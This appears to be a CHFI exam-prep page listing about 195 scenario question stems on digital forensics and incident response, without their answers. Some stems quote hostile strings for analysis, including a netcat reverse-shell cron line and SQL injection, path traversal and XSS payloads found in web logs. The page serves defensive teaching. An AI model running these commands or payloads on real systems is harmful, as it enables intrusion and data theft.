CHFI · domain
scenario questions
Practise Computer Hacking Forensic Investigator CHFI scenario questions practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.
Focused practice
Practice scenario questions questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about scenario questions
scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
How the topic appears in realistic exam-style scenarios.
Which detail in the question changes the correct answer.
How to eliminate plausible but wrong options.
How to connect the question back to the wider exam objective.
Watch out for
Common scenario questions exam traps
- ▸Answering from memory before reading the full scenario.
- ▸Missing a constraint such as cost, availability, security, scope or command context.
- ▸Choosing a broad answer when the question asks for the most specific fix.
- ▸Ignoring why the wrong options are tempting.
Question index
All scenario questions questions (745)
Click any question to see the full explanation, or start a practice session above.
An organization receives a legal hold notice regarding a pending lawsuit. The IT department is instructed to preserve all relevant electronically stored information (ESI). Which of the following actions must be taken FIRST?
Hard2Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)
Easy3You are a forensic investigator responding to a security incident at a medium-sized company. The incident involved an attacker gaining unauthorized access to a Windows Server 2019 system. The server was taken offline by the IT team immediately after detection. Your task is to acquire forensic evidence from the server's hard drive. The server has a single 500 GB NTFS partition. You have a forensic workstation with a write blocker, a SATA-to-USB adapter, and a forensic imaging tool that supports both dd and EWF (E01) formats. The server is still physically in the server room, and the IT team has powered it off. You need to create a forensic image that preserves the integrity of the evidence and allows for efficient analysis. Which of the following is the most appropriate course of action?
Medium4An analyst runs 'regshot' before and after executing a suspicious binary. The report shows that the binary added a value to HKLM\SYSTEM\CurrentControlSet\Services\MyService with 'ImagePath' pointing to C:\Windows\system32\malware.exe and 'Start' set to 2. What is the MOST likely purpose?
Hard5During an iOS forensic examination, an analyst extracts the iTunes backup of a suspect iPhone. The analyst wants to review deleted SMS messages. Which SQLite database file should be examined?
Medium6During malware analysis, an analyst discovers that a sample uses a technique to modify its own code at runtime to evade signature detection. Which anti-forensic technique does this describe?
Hard7Which THREE of the following are steps in the forensic investigation process? (Select three.)
Hard8A security analyst arrives at a suspected computer crime scene. The computer is on and a user is logged in. The analyst needs to preserve volatile data. According to first responder duties, what should the analyst do FIRST?
Medium9Which TWO of the following are tools that can be used for timeline analysis in digital forensics?
Easy10An examiner acquires a full file system image from an Android device running Android 11. While parsing the image, they need to identify which application was used to send a specific SMS message that was deleted shortly after being sent. The device uses Google Messages as the default SMS app. Which artefact location is MOST likely to contain remnants of the deleted SMS content?
Hard11A first responder arrives at a scene where a computer is suspected to contain evidence of fraud. The computer is turned on and a file is open. Which of the following actions should the responder AVOID?
Medium12During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?
Medium13A forensic analyst is examining a malware sample that uses packing to obfuscate its code. Which static analysis tool is BEST suited to identify the packer used and potentially unpack the executable?
Hard14A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?
Medium15An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?
Medium16A forensic analyst is investigating a compromised Linux server running an ext4 file system. The analyst suspects the attacker deleted critical log files (e.g., /var/log/auth.log) and wants to recover them. Which TWO techniques would be MOST effective for recovering the deleted files?
Medium17During a forensic examination of a Windows system, an analyst runs the Volatility plugin `netscan` on a memory dump. What information does this plugin primarily provide?
Medium18A forensic examiner needs to verify the integrity of a forensic image after acquisition. Which of the following methods is the MOST reliable for ensuring the image has not been altered?
Medium19A security analyst is investigating a compromised Windows server and wants to capture the contents of RAM for analysis. Which of the following tools is specifically designed for this purpose?
Easy20An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?
Medium21A forensic investigator is preparing to acquire a USB flash drive that is suspected to contain evidence of intellectual property theft. The investigator needs to ensure that the acquisition process does not alter any data on the flash drive. Which of the following should the investigator use?
Easy22A security analyst runs the command `regshot64.exe compare` after executing malware. Regshot reports that the following registry key was created: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecureUpdate`. Which conclusion is MOST likely?
Hard23Which Windows Event ID is generated when a service is installed on a system?
Easy24A forensic examiner is analyzing an Android device that was factory reset. Which TWO artefacts or methods could the examiner use to potentially recover or identify data from before the reset?
Medium25A security team suspects a data breach via an external attacker. The incident response plan requires preservation of evidence for legal proceedings. Which order of volatility should the first responder follow?
Medium26A forensic examiner needs to acquire a hard drive that is part of a RAID 5 array. The RAID controller is unavailable. What is the best approach to acquire the data?
Easy27Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?
Easy28During a mobile forensic investigation of an iPhone, an examiner needs to recover deleted SMS messages. Which acquisition method provides the highest likelihood of retrieving deleted data from the device's flash memory?
Easy29During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. What is the primary purpose of using a hardware write blocker?
Medium30A first responder arrives at a suspected data breach scene. The system is powered on and a user is logged in. Which of the following actions should the responder take FIRST to preserve volatile data?
Medium31During dynamic analysis of a malware sample in a sandbox, an analyst observes the following behaviours: (1) A file is created at C:\Windows\System32\drivers\etc\hosts, (2) A registry key is set at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateSvc, (3) Outbound TCP connections to 198.51.100.10 on port 8080. Which THREE of the following IoCs are MOST relevant to share with the threat intelligence team?
Hard32Which THREE of the following are common indicators of compromise (IoCs) that can be used to detect malware infections?
Easy33Which THREE of the following are techniques used to hide data on a hard drive?
Medium34In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?
Easy35During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?
Hard36Refer to the exhibit. A first responder runs the netstat command on a compromised Windows workstation. Which of the following conclusions is BEST supported by the output?
Easy37Which two of the following are tools used for memory forensics acquisition? (Choose TWO.)
Easy38During a forensic acquisition, you notice that the target drive has bad sectors. What is the best approach to acquire the drive?
Medium39During a forensic analysis of a Windows 10 system, an investigator needs to locate the Master File Table ($MFT) to analyze file metadata. Which file system structure contains the $MFT?
Easy40In iOS forensics, which database file typically contains the call history, including incoming, outgoing, and missed calls?
Medium41An analyst notices that a file on an NTFS volume occupies 4096 bytes on disk but its actual data is only 100 bytes. The extra space contains remnants of a previously deleted file. What is this extra space called?
Medium42An analyst is conducting memory forensics on a Windows system using Volatility. Which THREE commands can provide information about network connections?
Hard43An analyst is examining a RAID 5 array of three disks. One disk has failed and been replaced; the array is rebuilding. Which of the following is the most significant forensic challenge regarding data acquisition from this array?
Hard44Which TWO of the following are essential steps that a first responder should take when arriving at a digital crime scene? (Select TWO)
Medium45An Android device is found with factory reset performed. The forensic examiner wants to recover as much data as possible. Which of the following artefacts is MOST likely to survive a factory reset and provide useful evidence?
Medium46During a cloud forensics investigation, the investigator discovers that the cloud provider uses shared storage for multiple tenants. Which challenge is MOST likely to arise when acquiring a forensic image?
Medium47A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?
Medium48During a forensic examination of a Windows system, the investigator finds a file named 'notes.txt' that contains a list of passwords. The file's last modified timestamp is before the incident date, but its last accessed timestamp is during the incident. Which type of evidence is this file considered?
Medium49A forensic investigator is analyzing an ext4 file system from a Linux server. The investigator needs to locate the superblock, which contains critical file system metadata such as block size, total inode count, and mount count. The primary superblock is damaged, so the investigator must find a backup superblock. Which of the following commands or methods is most appropriate to locate a backup superblock on the ext4 file system?
Medium50You are responding to a suspected malware infection on a Windows 10 system. The system is still running. Which of the following should you collect FIRST?
Medium51An analyst discovers a hidden partition on a hard drive that does not appear in the standard MBR partition table. The drive uses GPT partitioning. Which area of the disk should be examined to find evidence of a hidden partition?
Hard52A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?
Hard53During an email forensics investigation, an analyst examines headers and sees `Received: from mail.evil.com (192.168.1.100) by mail.victim.com` followed by `DKIM-Signature: v=1; a=rsa-sha256; d=evil.com; s=selector; bh=...; h=...; b=...`. The email claims to be from support@paypal.com. Which finding is the strongest indicator of spoofing?
Medium54Which forensic tool is specifically designed to recover lost partitions or file system structures and can also be used for data carving?
Easy55An analyst discovers a suspicious file named 'cmd.aspx' in the web root of an IIS server. The file contains ASPX code that executes system commands. The IIS logs show a POST request to '/cmd.aspx' with a 200 status code. Which type of attack is indicated?
Hard56A forensic investigator is required to testify in court about the findings of a digital investigation. Which of the following roles does the investigator fulfill?
Medium57A security analyst observes a process on a Windows system creating a mutex named "Global\{5B9E4E7E-8B2C-4F6D-A1A3-F2C8D9E0A1B2}" shortly after execution. The analyst also notes outbound connections to an IP address 203.0.113.50 on port 4444. Which malware behaviour indicator is MOST clearly demonstrated?
Hard58Which of the following tools is specifically designed for forensic imaging and can create compressed, segmented, or E01 format images?
Medium59In the context of cloud forensics, what is the primary challenge associated with volatile evidence in Infrastructure as a Service (IaaS) environments?
Easy60Which FOUR of the following are persistence mechanisms that can be used on Linux systems?
Hard61A forensic investigator is analyzing a RAID 0 array consisting of two disks. She uses FTK Imager to acquire the logical drive. However, the data appears interleaved. What additional step is necessary to properly assemble the image?
Hard62During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?
Medium63Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?
Medium64Which tool is specifically designed to perform physical extraction of data from mobile devices, including bypassing lock screens on many iOS and Android devices?
Easy65A forensic analyst finds a partition that uses the Master Boot Record (MBR) scheme. Which of the following is TRUE about the MBR partition table?
Easy66Which TWO of the following are examples of file carving tools? (Select two.)
Easy67A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?
Easy68In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?
Medium69A security analyst notices a process named 'svchost.exe' running from the directory 'C:\Users\Public\svchost.exe'. This is suspicious because legitimate svchost.exe runs from 'C:\Windows\System32'. What type of indicator is this?
Medium70A forensic analyst is examining an Android device using ADB extraction. Which TWO statements about ADB extraction are true?
Medium71An organization receives a litigation hold notice regarding an ongoing lawsuit. The IT administrator is instructed to preserve all relevant electronic records. Which of the following actions is MOST consistent with proper legal hold implementation?
Hard72A forensic analyst is examining a network intrusion detection system (NIDS) alert that triggered on a packet with the FIN, PSH, and URG flags set. What type of scan does this indicate?
Hard73A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?
Hard74During a forensic investigation of a hard disk, the investigator finds that the partition table is missing. The disk was previously partitioned using GPT. Which area of the disk should be examined to recover the GPT partition table?
Medium75You are a forensic investigator responding to a data breach at a financial institution. The compromised server is a Windows Server 2019 running a custom trading application. The server is still powered on and connected to the production network. The incident response team has instructed you to acquire forensic evidence while minimizing downtime. The server has 2 TB of storage with 500 GB used. You have a forensic workstation with a write-blocker and an empty 2 TB external drive. The server's RAM is 64 GB. You need to acquire both volatile data (RAM) and a forensic image of the disk. However, the legal team requires a verified bit-for-bit copy with cryptographic hash verification. Additionally, the server's performance is critical; acquiring RAM via network is not feasible due to bandwidth constraints. Which of the following is the best course of action?
Hard76Which Windows Event ID is generated when a new service is installed on a system?
Easy77Which TWO of the following are commonly used tools for file carving (recovering files based on file signatures)? (Select TWO.)
Easy78Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?
Easy79An analyst finds the following string in an IIS log: %3Cscript%3Ealert('XSS')%3C/script%3E. What does this indicate?
Easy80A forensic examiner is presented with evidence that a suspect's computer was used to commit a fraud. The defense argues that the evidence was obtained without a warrant. Which US Constitutional Amendment is MOST relevant to this argument?
Hard81During a malware analysis, an analyst uses a tool to monitor registry changes, file system modifications, and process activity simultaneously. Which tool is BEST suited for this integrated monitoring?
Medium82Which TWO of the following are Volatility plugins used for process enumeration? (Select two.)
Medium83During a forensic investigation of a compromised web server, an analyst examines the Apache access log and finds the following entry: '192.168.1.10 - - [12/Oct/2024:13:45:22 +0000] "GET /index.php?id=1 UNION SELECT username, password FROM users-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. What type of attack is MOST likely indicated?
Medium84You are a forensic investigator responding to a suspected data breach at a financial institution. The incident response team has isolated a Windows 10 workstation used by a former employee. The system is still powered on, and the login screen is displayed. Your task is to acquire forensic evidence in a defensible manner. The following actions are available: A. Immediately pull the power cord to perform a cold acquisition of the hard drive. B. Capture volatile data (RAM, network connections, running processes) using a trusted tool on a USB drive, then shut down normally and remove the hard drive for imaging. C. Boot the system from a forensic live CD and create a forensic image of the hard drive while the system is running. D. Use the built-in Windows backup to create a system image to an external drive. Which action is the most appropriate first step in this scenario?
Hard85Refer to the exhibit. An analyst recovers this binary log entry from a MySQL server. What does the timestamp '190101 10:00:00' represent?
Medium86An analyst is investigating a Linux system that used ext4. The suspect deleted several files and then ran 'fstrim' on the partition. Which of the following best describes the challenge in recovering the deleted data?
Hard87During a forensic investigation of a Google Cloud Platform (GCP) environment, an analyst reviews Audit Logs and sees a log entry with the method 'storage.objects.list' and a principal email 'attacker@gmail.com'. However, the identity is not from the organization's domain. What should the analyst conclude?
Hard88During a forensic examination of an SSD, the analyst notes that TRIM is enabled. What challenge does TRIM pose for data recovery?
Medium89Which of the following is a primary challenge in cloud forensics due to shared infrastructure?
Medium90A security analyst notices repeated entries in an IIS log: 10.0.0.2, -, 05/Feb/2023:08:12:34 +0000, GET /../../windows/system32/config/sam, 404, 0, 532. Which TWO of the following attack types are indicated by this log entry?
Medium91A forensic analyst is creating a forensic image of a suspect's hard drive using a write blocker. Which of the following BEST describes the purpose of using a hardware write blocker?
Medium92During a forensic investigation, an examiner wants to recover deleted files from a FAT32 file system. Which structure is most critical for file recovery?
Easy93An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?
Easy94During a forensic investigation, an analyst discovers that the suspect's hard drive was encrypted using BitLocker. The analyst has obtained the recovery key. Which of the following is the best next step to ensure data integrity?
Easy95During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. Which of the following is the PRIMARY reason for using a write blocker?
Medium96A forensic analyst is examining a Docker container that was used to launch a DDoS attack. Which layer of a Docker image is most likely to contain the attacker's malicious scripts?
Hard97A security analyst discovers a suspicious registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate. The key points to a file in AppData. What is the most likely purpose of this registry key?
Medium98During a forensic investigation, an analyst creates a forensic image using `dcfldd` with the command: `dcfldd if=/dev/sda of=image.dd hash=sha256 hashwindow=10M`. What is the purpose of the `hashwindow` parameter?
Medium99During a forensic investigation of a compromised web server, you find the following entry in the IIS log: 192.168.2.50, -, 10/Jan/2023, 14:32:15, W3SVC1, WEB01, 192.168.2.10, 80, POST, /uploads/shell.aspx, 200, 0, 0, 513, 0, Mozilla/4.0. Which action should the investigator prioritize?
Medium100What is slack space in a file system?
Easy101Which tool is specifically designed to analyze email headers and track the path of an email across multiple servers?
Easy102An organization suspects a stealthy malware infection on a critical server. Traditional antivirus and EDR solutions have not detected anything. Which forensic approach would be most effective in identifying the malware, given that it likely resides only in memory?
Hard103An analyst is preparing to analyze a RAID 5 array of three disks. The analyst wants to reconstruct the logical volume for file system analysis. Which THREE steps are essential in this process?
Easy104A security analyst detects that a system's 'SeDebugPrivilege' is enabled for a suspicious process. Which technique is the malware MOST likely attempting to use?
Medium105A forensic investigator is analyzing a USB drive formatted with FAT32 and finds that a deleted file's directory entry still exists but the first character of the filename is replaced with 0xE5. What does this indicate?
Medium106During static analysis of a PE file, an analyst uses PEiD and detects the signature 'UPX 0.89.6 - 1.02 / 1.05 - 1.24'. What should the analyst do next?
Hard107A forensic analyst is examining a Windows 10 system and needs to view the Master File Table ($MFT) to identify recently deleted files. Which tool is most appropriate for parsing the $MFT directly?
Easy108An investigator recovers a suspicious file from a compromised system. Using PEiD, the file is detected as 'UPX 0.89.6 - 1.02 / 1.05 - 1.24'. What is the MOST appropriate next step in the analysis?
Medium109A security analyst is reviewing the output from a forensic tool examining an iOS Keychain. The analyst finds an entry with the attribute 'kSecAttrAccessible' set to 'kSecAttrAccessibleWhenUnlockedThisDeviceOnly'. What does this indicate?
Medium110An analyst examining an Outlook PST file wants to recover deleted emails that are no longer visible in the Deleted Items folder. Which technique is MOST effective?
Medium111A security analyst is investigating a phishing email and notices the DKIM-Signature header is present but fails validation. Which TWO actions should the analyst take?
Medium112Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)
Hard113Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?
Easy114Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?
Easy115A first responder arrives at a crime scene where a computer is running. According to standard forensic procedure, what should the responder do FIRST?
Easy116You are a forensic investigator responding to a data breach at a mid-sized company. The company uses a hybrid cloud environment with AWS for production workloads and on-premises servers for legacy applications. The breach was detected when an internal monitoring system flagged unusual outbound traffic from an AWS EC2 instance (i-0a1b2c3d4e5f) to an external IP address (198.51.100.20) on TCP port 4444 during off-hours. The EC2 instance runs a Linux-based web server. The security team has already isolated the instance by removing its security group rules and stopping the instance. You have been provided with the following: (1) AWS CloudTrail logs for the past 72 hours, (2) VPC Flow Logs for the same period, (3) a snapshot of the instance’s root volume (EBS), and (4) the instance metadata log from the AWS console. The company’s incident response policy requires preservation of all volatile data before powering off the instance. Which of the following steps should you take FIRST to ensure a forensically sound investigation?
Hard117An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?
Hard118A forensic investigator is documenting evidence for a case. What is the PRIMARY purpose of maintaining an unbroken chain of custody for digital evidence?
Medium119A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?
Medium120During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?
Hard121You are investigating a network breach at a financial institution. The organization uses a network-based intrusion detection system (NIDS) and maintains full packet capture (PCAP) for critical segments. The incident allegedly started with a spear-phishing email that delivered a remote access trojan (RAT). The security team has isolated the infected host and provided you with a disk image of the host and a PCAP file covering the network traffic from the host for the 24-hour period before isolation. In the PCAP, you see a series of TCP connections from the host to an external IP address on port 443 (HTTPS). The external IP is known to be associated with a command-and-control (C2) server. However, the disk image shows no evidence of the RAT binary or any malicious files. The host's antivirus logs are clean. Which of the following is the most likely explanation for the lack of evidence on the disk?
Medium122An investigator is analyzing email headers and notices the following: The 'Received' headers show a path through multiple servers, the 'DKIM-Signature' domain matches the sender domain, and 'X-Originating-IP' is present. Which TWO pieces of information are MOST useful to trace the original sender's IP address? (Choose two.)
Medium123An analyst is performing dynamic analysis of a malware sample in Cuckoo Sandbox. Which TWO of the following are typical indicators of command and control (C2) communication?
Medium124A malware analyst is analyzing a suspicious executable. Which THREE of the following are valid indicators of compromise (IoCs) that can be extracted from static analysis of the PE file? (Select THREE)
Hard125A forensic analyst is examining Azure Activity Logs for signs of privilege escalation. Which TWO of the following activities would be MOST indicative of an attacker attempting to escalate privileges? (Choose two.)
Medium126During an iOS forensic examination, an analyst extracts the SMS.db file from an iTunes backup. Which table within this database contains the actual message content and associated metadata such as timestamps and sender/recipient information?
Medium127A forensic examiner is analyzing a potentially malicious Portable Executable (PE) file recovered from a compromised host. The examiner uses PEStudio to inspect the file and notices that the Import Address Table (IAT) contains only two functions: LoadLibraryA and GetProcAddress. Which of the following does this most likely indicate?
Medium128A Docker container is suspected of malicious activity. Which THREE data sources should the investigator collect for forensic analysis?
Medium129A first responder arrives at a scene where a computer is turned on and a user is logged in. What is the FIRST action the responder should take to preserve volatile evidence?
Easy130During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?
Hard131A first responder arrives at a workstation suspected of being compromised by malware that is still running. The user is logged in and a suspicious process is active. The responder needs to capture volatile data before shutting down. Which command should be used first to capture the contents of RAM to a file?
Medium132During an investigation of a web application breach, an analyst reviews IIS logs and finds numerous entries with status code '200' and URIs containing '?cmd=' followed by encoded strings. The analyst also notices that some requests have a 'User-Agent' string resembling 'Microsoft-CryptoAPI/10.0'. What is the MOST likely conclusion?
Hard133Which THREE of the following are indicators of a webshell in web server logs? (Select THREE)
Medium134Which TWO of the following are valid methods to hide data on an NTFS file system without using external tools?
Medium135An investigator is analyzing a FAT32 drive and notices that a deleted file's directory entry still exists, but the first byte of the filename is changed to 0xE5. What does this indicate about the file?
Medium136What is the primary goal of the chain of custody in a digital forensic investigation?
Easy137A security analyst reviews Apache access logs and finds the following entry: `192.168.1.10 - - [12/Jul/2024:10:15:30 -0400] "GET /search.php?q=1' UNION SELECT username,password FROM users-- HTTP/1.1" 200 5321 "-" "Mozilla/5.0"`. Which attack technique is most likely being attempted?
Medium138During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?
Medium139During a malware analysis session, an analyst uses Process Monitor (Procmon) to observe a suspicious executable. Which of the following behavioral indicators would MOST strongly suggest the malware is attempting to establish persistence?
Medium140An analyst discovers that a Windows system has hidden data in the Host Protected Area (HPA) of the hard drive. Which tool or method can be used to detect and access the HPA?
Hard141A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?
Easy142During an iOS forensics investigation, an examiner extracts an iTunes backup and finds the SQLite database files. Which TWO of the following databases are LEAST likely to contain forensically relevant artefacts for a communication analysis?
Medium143A forensic investigator recovers a hard drive from a suspect's computer. The drive is detected as 120 GB in BIOS, but forensic tools report only 100 GB of addressable space. Which data hiding technique is MOST likely being used?
Medium144An investigator needs to analyze the contents of the Windows Recycle Bin on a system running Windows 10. Which artifact(s) should the investigator examine to determine the original location and deletion time of a file in the Recycle Bin?
Medium145A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)
Hard146A forensic analyst is examining a USB drive formatted with FAT32. A suspect claims they deleted a file several weeks ago. The analyst uses a carving tool but cannot recover the file. What is the MOST likely reason for the failed recovery?
Medium147Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?
Medium148An analyst receives an alert indicating a suspicious process (PID 3342) is making outbound connections on port 443 to an unknown IP. The system is a Windows 10 workstation. Which first responder action is MOST appropriate?
Easy149In email forensics, which TWO of the following headers are most useful for identifying the true origin of an email? (Select TWO.)
Medium150Which THREE of the following are indicators of a webshell compromise on a web server?
Hard151A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?
Medium152A forensic lab manager is setting up a new lab and must decide on the physical security measures. Which of the following is the MOST important to implement first?
Medium153A malware analyst is performing dynamic analysis of a suspicious executable in a Cuckoo Sandbox environment. Which THREE of the following behavioural indicators would be considered suspicious and warrant further investigation?
Medium154A forensic analyst is investigating a suspected data exfiltration from a MySQL database. Which log source would be MOST useful to identify the exact SQL queries executed, including SELECT statements that retrieved large volumes of data?
Hard155An analyst finds the following in an IIS log: 10.0.0.5, -, 02/15/2024, 14:23:56, GET /../../windows/system32/cmd.exe, 404, 0, 0, 0, Mozilla/4.0. Which attack technique does this log entry represent?
Medium156Which cloud service's audit logs would an investigator examine to identify who deleted a virtual machine in an Azure subscription?
Easy157A forensic analyst is examining a SQLite database from an iOS device backup. The database contains a table named 'message' with columns 'ROWID', 'text', 'handle_id', and 'date'. This database is MOST likely part of which iOS system database?
Medium158During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?
Hard159Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?
Medium160A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?
Hard161A security analyst examines a compromised Windows server and finds a file named 'readme.txt' that appears legitimate. However, using `dir /r`, they discover an alternate data stream named 'readme.txt:hidden.exe'. What is the most likely purpose of this alternate data stream?
Medium162You are imaging a suspect's hard drive using a write blocker and dd command. After imaging, you verify the hash of the original drive and the image file. The original drive hash is SHA1: A1B2C3D4E5..., and the image hash is SHA1: F6G7H8I9J0... What is the most likely cause of the mismatch?
Hard163In mobile forensics, which acquisition method preserves the highest level of data integrity and captures the most data from an iOS device?
Easy164Refer to the exhibit. During incident response, a first responder runs 'netstat -ano' on a compromised Windows system. Which connection is most likely to be the command-and-control (C2) channel and should be prioritized for isolation?
Easy165In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?
Easy166In an iOS forensic examination, an analyst extracts an encrypted iTunes backup. The backup contains a file named 'manifest.plist' which lists the backup version and encryption state. Which tool is specifically designed to brute-force the backup password using GPU acceleration?
Hard167An incident responder receives an alert that a workstation is beaconing to a known malicious IP address. The responder captures network traffic and analyzes it with Wireshark. Which of the following would be an immediate indicator of compromise (IoC) visible in the traffic capture?
Medium168The command used to acquire a disk image resulted in an I/O error. What is the most likely cause?
Medium169An incident responder analyzes a compromised system and finds evidence of timestomping: the Modified timestamp of a malicious DLL is earlier than the Creation timestamp. Additionally, the DLL is encrypted with an XOR key. Which anti-forensic techniques are being employed?
Hard170In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?
Easy171An investigator images an SSD that has TRIM enabled. Which of the following challenges will MOST likely affect the recovery of deleted files from this SSD?
Hard172During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?
Medium173A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?
Medium174Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?
Easy175In cloud forensics, one of the major challenges is that data may be stored in multiple jurisdictions with different legal requirements. This challenge is known as:
Easy176A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?
Medium177An analyst is examining a hard drive that was seized from a suspect. The drive is detected as a smaller capacity than listed on the label. Which of the following is the MOST likely explanation?
Medium178Which THREE of the following are best practices for a first responder when arriving at a computer crime scene?
Hard179Which TWO of the following are essential components of a proper chain of custody documentation? (Select TWO.)
Medium180During the initial response to a suspected data breach, a first responder discovers a live system with active network connections. The responder needs to preserve evidence while minimizing alteration. Which of the following is the MOST appropriate first step?
Medium181Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)
Medium182A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?
Medium183An analyst is examining a Windows 10 system and suspects the use of NTFS alternate data streams (ADS) to hide malicious executables. Which THREE methods can the analyst use to detect hidden ADS on the system?
Medium184During a mobile forensic investigation, an analyst uses Cellebrite UFED to extract data from a locked iOS device. The extraction successfully retrieves the device's passcode, call logs, SMS messages, and application data. Which extraction method did the analyst MOST likely use?
Medium185A Linux system uses the ext4 filesystem. A forensic analyst needs to recover a recently deleted file. Which of the following methods is MOST likely to succeed if the file's inode has not been reallocated?
Medium186During a mobile forensic investigation, an examiner wants to recover deleted WhatsApp messages from an Android device. Which of the following artefacts should the examiner examine? (Select TWO.)
Medium187During a forensic investigation, an analyst acquires a hard drive using a hardware write blocker. Which of the following is the PRIMARY reason for using a hardware write blocker?
Medium188A forensic investigator is examining a Windows 10 workstation that was seized after a suspected data exfiltration. The user claims they only used legitimate cloud storage. The investigator wants to determine which USB mass storage devices were previously connected to the system by examining the Windows registry. Which registry location should the investigator examine to find the device instance IDs and associated volume serial numbers of previously connected USB storage devices?
Medium189Which TWO of the following are common challenges specific to cloud forensics?
Easy190In the context of e-discovery, which THREE of the following are key steps in the Electronic Discovery Reference Model (EDRM)? (Select THREE)
Hard191An investigator is analyzing cloud storage logs and finds an entry showing that a file was accessed using the root credentials from an IP address in a different geographic region. The organization has strict policies against root usage. What should the investigator do FIRST?
Medium192A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?
Hard193An analyst is performing malware analysis and executes a suspicious binary in a sandbox. The sandbox reports that the binary creates a mutex named 'Global\DRIVER_UPDATE_MTX' before attempting to connect to 'http://malicious.com/update'. Which tool would BEST capture the network traffic during dynamic analysis?
Medium194Which of the following is an example of an indicator of compromise (IoC) that can be used to detect malware on a network?
Easy195During a forensic examination, an analyst uses the command 'dd if=/dev/sda of=/mnt/evidence/image.dd bs=4096 conv=noerror,sync'. What is the primary purpose of the 'conv=noerror,sync' option in this context?
